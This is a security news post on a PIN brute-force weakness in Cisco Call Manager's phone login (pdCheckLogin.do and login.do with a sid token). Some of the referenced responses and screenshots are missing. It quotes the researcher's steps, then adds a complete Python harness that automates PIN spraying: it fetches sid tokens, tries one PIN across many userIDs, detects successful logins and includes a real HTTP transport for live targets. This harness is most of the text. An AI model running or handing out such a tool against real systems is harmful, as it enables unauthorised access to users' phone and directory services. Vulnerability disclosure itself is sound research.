Roberto Suggi Liverani, founder of the OWASP (Open Web Application Security Project) New Zealand chapter, has published a PIN brute force vulnerability in Cisco Call Manager, also known as Cisco Unified Communications Manager, a software-based call processing system developed by Cisco Systems.

Here is the step-by-step description of the vulnerability, in the researcher's own words:

The handset initiates the login sequence with a simple HTTP GET request, such as the one below:

GET https://x.x.x.x/ccmpd/pdCheckLogin.do?name=undefined

The response contains a reference to the login.do page along with a “sid” token, which is used in the subsequent requests, as shown in the response below:


The sid token is required to perform the PIN brute force attack.

Also, the response provides some clues on which parameters to include in the login request, such as userID and PIN. The following GET request can then be used to perform a PIN brute force attack.


At this stage, it is possible to perform a PIN brute force attack, as a valid SID token needs to be passed when authenticating the user.

In case the userid/PIN are wrong, the following response is returned:


It does not seem possible to perform userID enumeration. In that case, it is recommended to use a large username dictionary file and try each username against the same PIN (e.g. common values such as 1234 or 12345). This can easily be done using the Burp Intruder tab, as shown below:



If the correct userID/PIN are found, the response will contain links for each service, as shown below:



The above sequence of requests can be trivially automated with a web proxy such as Burp, for instance by setting up a macro.


If a valid userID/PIN is found, it is recommended to stop the brute force attack, generate a new sid token and then restart the brute force attack.
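The sequence above (fetch a sid from pdCheckLogin.do, submit userID/PIN to login.do with that sid, spray one common PIN across a username list, regenerate the sid after every hit) as a small Python harness. This is an added example, not code from this page or from Roberto Suggi Liverani's write-up. The paths /ccmpd/pdCheckLogin.do?name=undefined and login.do and the parameter names userID, PIN and sid come from the text; everything else is assumed: that the sid appears in the query string of the login.do reference, that login.do accepts sid, userID and PIN as GET parameters, the page bodies returned by the constructed fake_cucm stand-in, and the helper names. Success is detected by comparing each response against a failure baseline rather than by matching an error string the page never shows.

```python
import re
import ssl
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable, List, Tuple

# A transport is anything that takes an absolute URL and returns the body as text,
# so the same logic runs against a real Call Manager or the offline stand-in below.
Fetch = Callable[[str], str]

# Assumed: the pdCheckLogin.do response references login.do with the sid in the query string.
SID_RE = re.compile(r'login\.do\?[^\s"<>]*?\bsid=([\w\-]+)')


def http_fetch(url: str, timeout: float = 10.0) -> str:
    """Real transport over urllib. Certificate checks stay on; for a lab CUCM with a
    self-signed certificate swap in ssl._create_unverified_context() deliberately."""
    ctx = ssl.create_default_context()
    with urllib.request.urlopen(url, timeout=timeout, context=ctx) as resp:
        return resp.read().decode("utf-8", "replace")


def get_sid(base: str, fetch: Fetch) -> str:
    """Step 1 of the post: GET pdCheckLogin.do?name=undefined and pull the sid token
    out of the login.do reference in the response."""
    body = fetch(f"{base}/ccmpd/pdCheckLogin.do?name=undefined")
    match = SID_RE.search(body)
    if not match:
        raise RuntimeError("no sid token found in pdCheckLogin.do response")
    return match.group(1)


def login_url(base: str, sid: str, userid: str, pin: str) -> str:
    """Step 2: the login request. Parameter names userID and PIN come from the post;
    sending them as GET parameters on login.do alongside sid is an assumption."""
    query = urllib.parse.urlencode({"sid": sid, "userID": userid, "PIN": pin})
    return f"{base}/ccmpd/login.do?{query}"


def spray_pin(base: str, fetch: Fetch, userids: Iterable[str], pin: str,
              bogus_user: str = "__no_such_user__") -> List[Tuple[str, str]]:
    """Try one common PIN against many userIDs (the post's recommendation, since
    userID enumeration is not possible). A hit is detected as 'body differs from the
    failure baseline' rather than by matching a specific error string, because a
    wrong userID/PIN returns one fixed error page while a correct pair returns the
    per-service links. After a hit the sid is regenerated and the baseline re-taken,
    as the post advises."""
    sid = get_sid(base, fetch)
    baseline = fetch(login_url(base, sid, bogus_user, pin))
    hits: List[Tuple[str, str]] = []
    for uid in userids:
        body = fetch(login_url(base, sid, uid, pin))
        if body != baseline:
            hits.append((uid, pin))
            sid = get_sid(base, fetch)
            baseline = fetch(login_url(base, sid, bogus_user, pin))
    return hits


def fake_cucm(valid: Dict[str, str]) -> Fetch:
    """Constructed offline stand-in for a Call Manager. It implements only the
    behaviour the post describes (sid issued by pdCheckLogin.do, login.do requiring
    a live sid, fixed error body on failure, service links on success); the page
    bodies and the sid format are invented for this example."""
    issued: set = set()

    def fetch(url: str) -> str:
        parts = urllib.parse.urlsplit(url)
        query = dict(urllib.parse.parse_qsl(parts.query))
        if parts.path.endswith("/pdCheckLogin.do"):
            sid = f"{len(issued) + 1:08x}"
            issued.add(sid)
            return f'<a href="login.do?sid={sid}">login</a>'
        if parts.path.endswith("/login.do"):
            if query.get("sid") not in issued:
                return "Invalid session"
            if valid.get(query.get("userID", "")) == query.get("PIN"):
                return ('<CiscoIPPhoneMenu><MenuItem><Name>Corporate Directory</Name>'
                        '</MenuItem></CiscoIPPhoneMenu>')
            return "Login is not correct"
        return "Not found"

    return fetch


if __name__ == "__main__":
    # Offline demo; against a live target replace fake_cucm(...) with http_fetch.
    target = "https://x.x.x.x"
    transport = fake_cucm({"jsmith": "1234", "ldoe": "2468"})
    print(spray_pin(target, transport, ["alice", "jsmith", "bob", "ldoe"], "1234"))
```

The baseline comparison is what makes the harness usable without knowing the exact wording of the error page: one request with a userID that cannot exist captures the failure body, and anything that differs from it is treated as a candidate hit to be confirmed by hand. Re-taking the baseline after every sid regeneration matters because a failure page may embed the sid itself.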

